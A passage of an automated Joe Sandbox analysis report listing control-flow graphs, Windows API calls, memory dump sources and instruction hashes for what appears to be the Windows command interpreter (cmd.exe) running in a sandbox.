7ff71966c84d-7ff71966c855 call 7ff71966cad4 1055->1076 1077 7ff71966c856-7ff71966c86c 1055->1077 1056->1045 1063 7ff71966c817-7ff71966c81b 1057->1063 1064 7ff71966c9e2-7ff71966c9e7 1057->1064 1058->1057 1067 7ff71966c83d 1061->1067 1068 7ff71966c78a-7ff71966c7a4 wcschr 1061->1068 1070 7ff71966ca1b-7ff71966ca1f 1063->1070 1071 7ff71966c821 1063->1071 1064->1063 1072 7ff71966c9ed-7ff71966c9f7 call 7ff71967291c 1064->1072 1067->1055 1074 7ff71966c8de-7ff71966c8f7 1068->1074 1075 7ff71966c7aa-7ff71966c7ad 1068->1075 1070->1071 1078 7ff71966ca25-7ff71967c6b3 call 7ff719663278 1070->1078 1079 7ff71966c824-7ff71966c82d 1071->1079 1086 7ff71966c9fd-7ff71966ca00 1072->1086 1087 7ff71967c684-7ff71967c698 call 7ff719663278 1072->1087 1082 7ff71966c900-7ff71966c908 1074->1082 1083 7ff71966c7b0-7ff71966c7b8 1075->1083 1076->1077 1077->1039 1077->1044 1078->1004 1079->1079 1080 7ff71966c82f-7ff71966c837 1079->1080 1080->1061 1080->1067 1082->1082 1088 7ff71966c90a-7ff71966c915 1082->1088 1083->1083 1089 7ff71966c7ba-7ff71966c7c7 1083->1089 1086->1063 1093 7ff71966ca06-7ff71966ca10 call 7ff7196689c0 1086->1093 1087->1004 1094 7ff71966c93a-7ff71966c944 1088->1094 1095 7ff71966c917 1088->1095 1089->1050 1096 7ff71966c7cd-7ff71966c7db 1089->1096 1093->1063 1111 7ff71966ca16-7ff71967c67f GetLastError call 7ff719663278 1093->1111 1103 7ff71966ca2a-7ff71966ca2f call 7ff719679158 1094->1103 1104 7ff71966c94a 1094->1104 1100 7ff71966c920-7ff71966c928 1095->1100 1101 7ff71966c7e0-7ff71966c7e7 1096->1101 1106 7ff71966c92a-7ff71966c92f 1100->1106 1107 7ff71966c932-7ff71966c938 1100->1107 1108 7ff71966c7e9-7ff71966c7f1 1101->1108 1109 7ff71966c800-7ff71966c803 1101->1109 1103->1013 1104->1007 1106->1107 1107->1094 1107->1100 1108->1109 1112 7ff71966c7f3-7ff71966c7fe 1108->1112 1109->1040 1113 7ff71966c809 1109->1113 1111->1004 1112->1101 1112->1109 1113->1057
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleTitlewcschr
                                                                    • String ID: /$:
                                                                    • API String ID: 2364928044-4222935259
                                                                    • Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                    • Instruction ID: a0b246a9261538930a950a759bba8581d210ef4d2a965b26803e90b897afefbe
                                                                    • Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                    • Instruction Fuzzy Hash: DAC19F61E08E4281FB64BF25D454279A6B2EF91BB8FC45135DA1E462D9DF3CE84A8330

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1171 7ff719678d80-7ff719678da2 1172 7ff719678da4-7ff719678daf 1171->1172 1173 7ff719678dcc 1172->1173 1174 7ff719678db1-7ff719678db4 1172->1174 1177 7ff719678dd1-7ff719678dd9 1173->1177 1175 7ff719678db6-7ff719678dbd 1174->1175 1176 7ff719678dbf-7ff719678dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff719678ddb-7ff719678de5 _amsg_exit 1177->1178 1179 7ff719678de7-7ff719678def 1177->1179 1180 7ff719678e4c-7ff719678e54 1178->1180 1181 7ff719678e46 1179->1181 1182 7ff719678df1-7ff719678e0a 1179->1182 1184 7ff719678e56-7ff719678e69 _initterm 1180->1184 1185 7ff719678e73-7ff719678e75 1180->1185 1181->1180 1183 7ff719678e0e-7ff719678e11 1182->1183 1186 7ff719678e38-7ff719678e3a 1183->1186 1187 7ff719678e13-7ff719678e15 1183->1187 1184->1185 1188 7ff719678e77-7ff719678e79 1185->1188 1189 7ff719678e80-7ff719678e88 1185->1189 1186->1180 1190 7ff719678e3c-7ff719678e41 1186->1190 1187->1190 1191 7ff719678e17-7ff719678e1b 1187->1191 1188->1189 1192 7ff719678e8a-7ff719678e98 call 7ff7196794f0 1189->1192 1193 7ff719678eb4-7ff719678ec8 call 7ff7196737d8 1189->1193 1198 7ff719678f28-7ff719678f3d 1190->1198 1195 7ff719678e2d-7ff719678e36 1191->1195 1196 7ff719678e1d-7ff719678e29 1191->1196 1192->1193 1201 7ff719678e9a-7ff719678eaa 1192->1201 1200 7ff719678ecd-7ff719678eda 1193->1200 1195->1183 1196->1195 1203 7ff719678edc-7ff719678ede exit 1200->1203 1204 7ff719678ee4-7ff719678eeb 1200->1204 1201->1193 1203->1204 1205 7ff719678eed-7ff719678ef3 _cexit 1204->1205 1206 7ff719678ef9 1204->1206 1205->1206 1206->1198
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                    • String ID:
                                                                    • API String ID: 4291973834-0
                                                                    • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                    • Instruction ID: f95fefcf2914481de203cd54ef4f083e0ee99bbd84794a41a1c8205764e793eb
                                                                    • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                    • Instruction Fuzzy Hash: 1C410A31A08E038AF654BF10E990675A2B2AF543ACFC40476E91D476A1DF7CEC4A8771

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1207 7ff7196689c0-7ff719668a3d memset call 7ff71966ca40 1210 7ff719668ace-7ff719668adf 1207->1210 1211 7ff719668a43-7ff719668a71 GetDriveTypeW 1207->1211 1212 7ff719668aed 1210->1212 1213 7ff719668ae1-7ff719668ae8 ??_V@YAXPEAX@Z 1210->1213 1214 7ff719668a77-7ff719668a7a 1211->1214 1215 7ff71967b411-7ff71967b422 1211->1215 1217 7ff719668aef-7ff719668b16 call 7ff719678f80 1212->1217 1213->1212 1214->1210 1216 7ff719668a7c-7ff719668a7f 1214->1216 1218 7ff71967b424-7ff71967b42b ??_V@YAXPEAX@Z 1215->1218 1219 7ff71967b430-7ff71967b435 1215->1219 1216->1210 1220 7ff719668a81-7ff719668ac8 GetVolumeInformationW 1216->1220 1218->1219 1219->1217 1220->1210 1222 7ff71967b3fc-7ff71967b40b GetLastError 1220->1222 1222->1210 1222->1215
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                    • String ID:
                                                                    • API String ID: 850181435-0
                                                                    • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                    • Instruction ID: e2e75a8564cf8f088e500b90007863c8ca339b61af74af0c2638904328efb993
                                                                    • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                    • Instruction Fuzzy Hash: 3C418D32608FC1C9E7609F20D8442EDB7B5FB89B98F845526DA4D4BB48CF38D54AC720

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1224 7ff719674a14-7ff719674a3e GetEnvironmentStringsW 1225 7ff719674aae-7ff719674ac5 1224->1225 1226 7ff719674a40-7ff719674a46 1224->1226 1227 7ff719674a59-7ff719674a8f GetProcessHeap HeapAlloc 1226->1227 1228 7ff719674a48-7ff719674a52 1226->1228 1230 7ff719674a91-7ff719674a9a memmove 1227->1230 1231 7ff719674a9f-7ff719674aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff719674a54-7ff719674a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1225
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A28
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A66
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A7D
                                                                    • memmove.MSVCRT(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A9A
                                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674AA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                    • String ID:
                                                                    • API String ID: 1623332820-0
                                                                    • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                    • Instruction ID: 5078a9a7bf8f95425b5f29ba66845dccdb79aa1217f9bded61ccac4e0f5ee07e
                                                                    • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                    • Instruction Fuzzy Hash: 19119122A14B4286DA14AF45B40803DFBB2EB89FE4B899075DE4E03744DE3DE84A8770
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                    • String ID:
                                                                    • API String ID: 1826527819-0
                                                                    • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                    • Instruction ID: 8238b81ecac496d9c1003134b45f19836c3e2ded809b14b6132415a8764b90b5
                                                                    • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                    • Instruction Fuzzy Hash: 39011E31908A82CAE6047F25A455179FA72EB8A769FC461B4E54F06396DF3C944A8730
                                                                    APIs
                                                                      • Part of subcall function 00007FF719671EA0: wcschr.MSVCRT(?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF719690D54), ref: 00007FF719671EB3
                                                                    • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7196692AC), ref: 00007FF7196730CA
                                                                    • SetErrorMode.KERNELBASE ref: 00007FF7196730DD
                                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7196730F6
                                                                    • SetErrorMode.KERNELBASE ref: 00007FF719673106
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$FullNamePathwcschr
                                                                    • String ID:
                                                                    • API String ID: 1464828906-0
                                                                    • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                    • Instruction ID: b3611080a6e7b5596ba0acd44d9082d13de7d78f3a1a374ff213cfe6e9ec1dc7
                                                                    • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                    • Instruction Fuzzy Hash: 7B31E521A08A1586E629BF15A40047EF672EB45BB8FD49135DA4A473E0DF7DE84F8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                    • API String ID: 2221118986-3416068913
                                                                    • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                    • Instruction ID: 190be461f93cd5949cbc3500a92bdab36f0ac5be3180e28360e1b94fd93d19db
                                                                    • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                    • Instruction Fuzzy Hash: 1D11CA21E08F4685EB54EF55E14427992B29F84BB8F944332DE6D4B3D9DD2CD44A4370
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcschr
                                                                    • String ID: 2$COMSPEC
                                                                    • API String ID: 1764819092-1738800741
                                                                    • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                    • Instruction ID: 3ac7342fffc216e6a71d26f0d656ec5bd00e4c5a18815714d66617ffc5756ab0
                                                                    • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                    • Instruction Fuzzy Hash: C8516D21E0CE4285FBA4BF35A451379A2B69F84BECFC44031DA4D466D5DE3CE44A8771
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                    • String ID:
                                                                    • API String ID: 4254246844-0
                                                                    • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                    • Instruction ID: 2bcb4d82657106805a799eaac89e7e87ea78baa96d4d8cd47e9fd64c834975e8
                                                                    • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                    • Instruction Fuzzy Hash: 5141A321A08F4286EE29AF00E455779E7B2EF95BA8FC44531DA4D47794DF3CE44E8630
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$EnvironmentFreeProcessVariable
                                                                    • String ID:
                                                                    • API String ID: 2643372051-0
                                                                    • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                    • Instruction ID: 831651cb5149e61a47b15f4742ac684b1f780fa835ee8fb9853e65ca6fe224e7
                                                                    • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                    • Instruction Fuzzy Hash: BEF08662A19F4285EB04AF66F544079EAF3FF5DBB4B859274C52E03394DE3C944A8230
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _get_osfhandle$ConsoleMode
                                                                    • String ID:
                                                                    • API String ID: 1591002910-0
                                                                    • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                    • Instruction ID: acacac19a16dbcac05c7a602036173054ef49b6fd84bb4f25be5165f6325924a
                                                                    • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                    • Instruction Fuzzy Hash: 86F07A34A09E02CBE604AF11E845578BBB2FB89B69F855574C90E43310DF3DA40A8B30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: DriveType
                                                                    • String ID: :
                                                                    • API String ID: 338552980-336475711
                                                                    • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                    • Instruction ID: 957be06ee0999e4b06f644d179d2ef2d7c5bf27f8d2a5c64844206a5e4aaff33
                                                                    • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                    • Instruction Fuzzy Hash: BFE06576618A4086D7209F54E45106AF7B1FB9D358FC41525E98D83724DB3CD14ACB18
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                      • Part of subcall function 00007FF71966CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    • GetConsoleTitleW.KERNELBASE ref: 00007FF719675B52
                                                                      • Part of subcall function 00007FF719674224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF719674297
                                                                      • Part of subcall function 00007FF719674224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7196742D7
                                                                      • Part of subcall function 00007FF719674224: memset.MSVCRT ref: 00007FF7196742FD
                                                                      • Part of subcall function 00007FF719674224: memset.MSVCRT ref: 00007FF719674368
                                                                      • Part of subcall function 00007FF719674224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF719674380
                                                                      • Part of subcall function 00007FF719674224: wcsrchr.MSVCRT ref: 00007FF7196743E6
                                                                      • Part of subcall function 00007FF719674224: lstrcmpW.KERNELBASE ref: 00007FF719674401
                                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF719675BC7
                                                                    Memory Dump Source
